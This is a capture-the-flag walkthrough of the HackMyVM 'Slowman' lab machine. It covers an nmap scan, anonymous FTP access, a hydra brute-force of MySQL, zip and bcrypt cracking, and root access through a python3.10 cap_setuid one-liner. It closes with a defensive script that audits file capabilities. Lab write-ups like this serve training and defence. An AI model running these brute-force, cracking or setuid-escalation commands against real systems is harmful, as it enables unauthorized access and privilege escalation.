
[HackMyVM] Target machine: Slowman


Kali: 192.168.56.104

Target: 192.168.56.132

Port scan

  # nmap 192.168.56.132
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-24 15:28 CST
  Nmap scan report for 192.168.56.132
  Host is up (0.00066s latency).
  Not shown: 995 filtered tcp ports (no-response)
  PORT     STATE  SERVICE
  20/tcp   closed ftp-data
  21/tcp   open   ftp
  22/tcp   open   ssh
  80/tcp   open   http
  3306/tcp open   mysql

Ports 21, 22, 80 and 3306 are open (20 shows up as closed).

Port 21 allows anonymous login; passive mode has to be turned off first.

  # ftp 192.168.56.132
  Connected to 192.168.56.132.
  220 (vsFTPd 3.0.5)
  Name (192.168.56.132:root): anonymous
  331 Please specify the password.
  Password:
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> ls
  229 Entering Extended Passive Mode (|||43514|)
  ^C
  receive aborted. Waiting for remote to finish abort.
  ftp> passive
  Passive mode: off; fallback to active mode: off.
  ftp> ls
  200 EPRT command successful. Consider using EPSV.
  150 Here comes the directory listing.
  -rw-r--r--    1 0        0              12 Nov 22 21:46 allowedusersmysql.txt
  226 Directory send OK.
  ftp> get allowedusersmysql.txt
  local: allowedusersmysql.txt remote: allowedusersmysql.txt
  200 EPRT command successful. Consider using EPSV.
  150 Opening BINARY mode data connection for allowedusersmysql.txt (12 bytes).
  100% |************************************************************************************************|    12        2.03 KiB/s    00:00 ETA
  226 Transfer complete.
  12 bytes received in 00:00 (1.70 KiB/s)
  ftp> exit
  221 Goodbye.

There is a txt file containing a MySQL username.

  # cat allowedusersmysql.txt
  trainerjeff

Brute-force the MySQL login with hydra.

  # hydra -l trainerjeff -P /usr/share/eaphammer/wordlists/rockyou.txt mysql://192.168.56.132
  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-24 15:33:03
  [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
  [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
  [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
  [DATA] attacking mysql://192.168.56.132:3306/
  [3306][mysql] host: 192.168.56.132   login: trainerjeff   password: soccer1

The brute-force yields the credentials trainerjeff/soccer1.

Connect and take a look.

  # mysql -u trainerjeff -h 192.168.56.132 -p
  Enter password:
  Welcome to the MariaDB monitor.  Commands end with ; or \g.
  Your MySQL connection id is 1070
  Server version: 8.0.35-0ubuntu0.22.04.1 (Ubuntu)
  Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
  Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  MySQL [(none)]> show databases;
  +--------------------+
  | Database           |
  +--------------------+
  | information_schema |
  | mysql              |
  | performance_schema |
  | sys                |
  | trainers_db        |
  +--------------------+
  5 rows in set (0.013 sec)
  MySQL [(none)]> use trainers_db;
  Reading table information for completion of table and column names
  You can turn off this feature to get a quicker startup with -A
  Database changed
  MySQL [trainers_db]> show tables;
  +-----------------------+
  | Tables_in_trainers_db |
  +-----------------------+
  | users                 |
  +-----------------------+
  1 row in set (0.004 sec)
  MySQL [trainers_db]> select * from users;
  +----+-----------------+-------------------------------+
  | id | user            | password                      |
  +----+-----------------+-------------------------------+
  |  1 | gonzalo         | tH1sS2stH3g0nz4l0pAsSWW0rDD!! |
  |  2 | $SECRETLOGINURL | /secretLOGIN/login.html       |
  +----+-----------------+-------------------------------+

This gives the account and password of user gonzalo, plus the login page /secretLOGIN/login.html.

gonzalo/tH1sS2stH3g0nz4l0pAsSWW0rDD!!

After logging in there is a zip archive.

Crack its password.

  # fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u credentials.zip
  PASSWORD FOUND!!!!: pw == spongebob1

It cracks immediately; the password is spongebob1.

  # unzip credentials.zip
  Archive:  credentials.zip
  [credentials.zip] passwords.txt password:
    inflating: passwords.txt
  ┌──(root㉿kali2)-[~/Desktop]
  └─# cat passwords.txt
  ----------
  $USERS: trainerjean
  $PASSWORD: $2y$10$DBFBehmbO6ktnyGyAtQZNeV/kiNAE.Y3He8cJsvpRxIFEhRAUe1kq

Crack this hash with john.

  # john abc.txt
  Using default input encoding: UTF-8
  Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
  Cost 1 (iteration count) is 1024 for all loaded hashes
  Proceeding with single, rules:Single
  Press 'q' or Ctrl-C to abort, almost any other key for status
  Almost done: Processing the remaining buffered candidate passwords, if any.
  Proceeding with wordlist:/usr/share/john/password.lst
  tweety1          (?)
  1g 0:00:04:31 DONE 2/3 (2024-03-24 15:50) 0.003681g/s 39.19p/s 39.19c/s 39.19C/s trevor1..unicorn1
  Use the "--show" option to display all of the cracked passwords reliably
  Session completed.

The cracked password is tweety1.

Logging in over SSH gives the user flag directly; there is also a python history file.

  trainerjean@slowman:~$ cat .python_history
  import os
  os.system('bash')
  os.system('0')
  os.setid('0')
  os.setuid('0')
  exit

Privilege escalation is probably related to python.

There are two other users under /home, but neither directory is accessible.

  trainerjean@slowman:~$ ls /home
  gonzalo  trainerjean  trainerjeff

Looking for a path to root: sudo -l gives nothing, and checking processes and cron jobs gives nothing either.

Running linpeas shows that python has file capabilities.

  ╔══════════╣ Capabilities
  ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
  Current env capabilities:
  Current: =
  Current proc capabilities:
  CapInh: 0000000000000000
  CapPrm: 0000000000000000
  CapEff: 0000000000000000
  CapBnd: 000001ffffffffff
  CapAmb: 0000000000000000
  Parent Shell capabilities:
  0x0000000000000000=
  Files with capabilities (limited to 50):
  /snap/core20/2015/usr/bin/ping cap_net_raw=ep
  /snap/core20/1974/usr/bin/ping cap_net_raw=ep
  /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
  /usr/bin/python3.10 cap_setuid=ep
  /usr/bin/mtr-packet cap_net_raw=ep
  /usr/bin/ping cap_net_raw=ep

So the escalation goes through the python capability (cap_setuid on /usr/bin/python3.10).

  trainerjean@slowman:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  # id
  uid=0(root) gid=1002(trainerjean) groups=1002(trainerjean)
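From the defender's side, the root cause here is a file capability (cap_setuid=ep) sitting on a general-purpose interpreter, which hands that capability to every local user who can run it. The script below is an added example, not part of the original write-up: it parses getcap -r / style output (the sample is constructed from the linpeas listing above) and flags dangerous capabilities and any capability on an interpreter; the DANGEROUS and INTERPRETERS lists are my own choices.

```python
import os
import re

# Constructed sample, modelled on the linpeas "Files with capabilities" block
SAMPLE_GETCAP = """\
/snap/core20/2015/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
"""

# Capabilities that let the holder change identity or bypass access checks
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}
# Interpreters execute arbitrary user code, so a file capability on one is
# effectively granted to every local user allowed to run it
INTERPRETERS = {"python", "perl", "ruby", "node", "php", "lua", "bash", "sh"}


def parse_getcap(text):
    """Parse 'path caps=flags' (libcap >= 2.41) or older 'path = caps+flags' lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, capspec = line.partition(" ")
        capspec = capspec.lstrip("= ")            # drop the old-format separator
        caps = re.findall(r"cap_[a-z_]+", capspec)
        m = re.search(r"[=+]([eip]+)$", capspec)  # e=effective i=inheritable p=permitted
        entries.append((path, caps, m.group(1) if m else ""))
    return entries


def audit(text):
    """Return (path, capability, reason) for every file that needs review."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        if "e" not in flags and "p" not in flags:
            continue  # neither effective nor permitted: inert, skip
        name = re.sub(r"[\d.]+$", "", os.path.basename(path))  # python3.10 -> python
        interp = name in INTERPRETERS
        for cap in caps:
            if cap in DANGEROUS:
                findings.append((path, cap, "identity/ACL bypass" + (" on interpreter" if interp else "")))
            elif interp:
                findings.append((path, cap, "capability on interpreter"))
    return findings
```

On a live host, feed it the output of `getcap -r / 2>/dev/null`; the fix for a hit like the python one is `setcap -r /usr/bin/python3.10`, and then working out why it was set.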
